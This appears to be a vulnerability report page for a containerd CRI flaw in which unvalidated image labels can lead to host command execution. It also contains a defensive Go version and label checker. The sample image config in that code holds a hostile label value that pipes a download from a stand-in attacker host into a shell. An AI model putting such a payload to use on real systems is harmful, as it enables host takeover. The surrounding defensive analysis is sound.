CVE-2026-53488
Received - Intake

BaseFortify

Vulnerability report for CVE-2026-53488, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-01

Last updated on: 2026-07-01

Assigner: GitHub, Inc.

Description

containerd is an open-source container runtime. In versions prior to 1.7.33, 2.3.2, 2.2.5, 2.1.9, and 2.0.10 the CRI plugin propagates labels from an image config (LABEL instruction in Dockerfile) to a container without validation. This may result in executing an arbitrary command on the host, via a plugin that consumes container labels for some operations. This issue has been fixed in versions 1.7.33, 2.3.2, 2.2.5, 2.1.9, and 2.0.10.

Meta Information

Published: 2026-07-01
Last Modified: 2026-07-01
EPSS Evaluated: N/A

Affected Vendors & Products

Showing 5 associated CPEs (one range per containerd release branch, derived from the fixed versions in the description)
Vendor Product Version / Range
containerd containerd to 1.7.33 (exc)
containerd containerd From 2.0.0 (inc) to 2.0.10 (exc)
containerd containerd From 2.1.0 (inc) to 2.1.9 (exc)
containerd containerd From 2.2.0 (inc) to 2.2.5 (exc)
containerd containerd From 2.3.0 (inc) to 2.3.2 (exc)

Exploitability

CWE ID Description
CWE-20 Improper Input Validation: the product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

AI Quick Actions

Executive Summary

CVE-2026-53488 is a vulnerability in containerd, an open-source container runtime (no CVSS score is listed on this page). The CRI plugin copies labels from an image configuration (the LABEL instructions in a Dockerfile) onto the container it creates without validating them. Because the labels are attacker-controlled whenever the image is, any plugin on the host that reads container labels and acts on them (for example by building a command from a label value) can be driven into executing an arbitrary command on the host.

Impact Analysis

The worst case is arbitrary command execution on the host running containerd, which means control of the node, access to every other container on it, and potential data theft or service disruption. Two conditions have to hold: the node must run an unpatched containerd, and a plugin that consumes container labels must be present on that node; the CRI plugin passing the labels through does not by itself execute anything. The risk is highest where nodes pull images from untrusted or loosely controlled sources, since a malicious LABEL is all the attacker needs to put in the image.

Mitigation Strategies

To mitigate this vulnerability, update containerd to the fixed release for the branch in use: 1.7.33, 2.0.10, 2.1.9, 2.2.5, or 2.3.2. Check the running version on every node (`containerd --version`), not just the package version recorded in your inventory.

Until the update is applied, restrict nodes to images from trusted sources (for example, an image allow-list or signature verification enforced at admission), review which plugins on your nodes act on container labels, and inspect the labels of images already in use, since exploitation requires an attacker-controlled LABEL in the image config.
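The two checks above, as an added example in Go (this is not containerd's code and not part of the original page). `IsAffected` compares a containerd version string against the fixed releases named in the description, treating each 2.x minor as its own branch; `SuspiciousLabels` reads the `config.Labels` section of an OCI image config and flags labels whose key or value contains shell metacharacters or control characters. The image config and the label key `example.plugin/hook` are constructed for the example and are not taken from any real plugin; the label check is a heuristic admission filter for untrusted images, not a fix.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
	"strconv"
	"strings"
	"unicode"
)

// fixedVersions are the first fixed releases named in the CVE description,
// one per maintained containerd branch.
var fixedVersions = []string{"1.7.33", "2.0.10", "2.1.9", "2.2.5", "2.3.2"}

// parseVersion turns "v2.1.9-rc.1" into [2 1 9] with pre=true. A '-' suffix is
// a pre-release tag; a '+' suffix is build metadata and is simply dropped.
func parseVersion(v string) (nums [3]int, pre bool, err error) {
	v = strings.TrimPrefix(strings.TrimSpace(v), "v")
	if i := strings.IndexAny(v, "-+"); i >= 0 {
		pre = v[i] == '-'
		v = v[:i]
	}
	parts := strings.Split(v, ".")
	if len(parts) != 3 {
		return nums, pre, fmt.Errorf("unexpected version %q", v)
	}
	for i, p := range parts {
		if nums[i], err = strconv.Atoi(p); err != nil {
			return nums, pre, fmt.Errorf("unexpected version %q", v)
		}
	}
	return nums, pre, nil
}

// IsAffected reports whether a containerd release is in an affected range:
// any 1.x before 1.7.33, or a 2.0/2.1/2.2/2.3 release before that branch's
// fix. A pre-release of the fix version (2.1.9-rc.1) counts as affected.
// Branches not named in the advisory (e.g. 2.4) are reported as unaffected.
func IsAffected(version string) (bool, error) {
	ver, pre, err := parseVersion(version)
	if err != nil {
		return false, err
	}
	for _, f := range fixedVersions {
		fix, _, _ := parseVersion(f)
		if ver[0] != fix[0] || (fix[0] >= 2 && ver[1] != fix[1]) {
			continue // different major, or a different 2.x minor branch
		}
		if ver == fix {
			return pre, nil
		}
		for i := 0; i < 3; i++ {
			if ver[i] != fix[i] {
				return ver[i] < fix[i], nil
			}
		}
	}
	return false, nil
}

// ociConfig is the part of an OCI image config that carries LABEL values.
// encoding/json matches field names case-insensitively, so the "Config"
// spelling used by `docker image inspect` output is accepted too.
type ociConfig struct {
	Config struct {
		Labels map[string]string `json:"Labels"`
	} `json:"config"`
}

// SuspiciousLabels returns, sorted, the keys of labels whose key or value
// contains shell metacharacters or control characters. Heuristic only: a
// plugin that treats a label as a command can be abused by a value that
// looks harmless here.
func SuspiciousLabels(configJSON []byte) ([]string, error) {
	var cfg ociConfig
	if err := json.Unmarshal(configJSON, &cfg); err != nil {
		return nil, err
	}
	risky := func(s string) bool {
		return strings.ContainsAny(s, ";|&$`<>") ||
			strings.IndexFunc(s, unicode.IsControl) >= 0
	}
	var keys []string
	for k, v := range cfg.Config.Labels {
		if risky(k) || risky(v) {
			keys = append(keys, k)
		}
	}
	sort.Strings(keys)
	return keys, nil
}

// sampleConfig is a constructed OCI image config. The key "example.plugin/hook"
// is hypothetical and stands in for whatever label a label-consuming plugin
// on the host would act on.
const sampleConfig = `{
  "architecture": "amd64",
  "os": "linux",
  "config": {
    "Labels": {
      "org.opencontainers.image.title": "demo",
      "maintainer": "team@example.com",
      "example.plugin/hook": "echo ok; curl http://attacker.example/x | sh"
    }
  }
}`

func main() {
	for _, v := range []string{"1.7.32", "2.1.9-rc.1", "2.3.2"} {
		affected, err := IsAffected(v)
		fmt.Printf("containerd %-10s affected=%v err=%v\n", v, affected, err)
	}
	keys, err := SuspiciousLabels([]byte(sampleConfig))
	fmt.Printf("suspicious labels: %v err=%v\n", keys, err)
}
```

Feed `IsAffected` the version token from `containerd --version` on each node, and `SuspiciousLabels` the image config blob fetched from your registry (or the `Config` section of `docker image inspect` output) before an image is admitted to an unpatched node.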
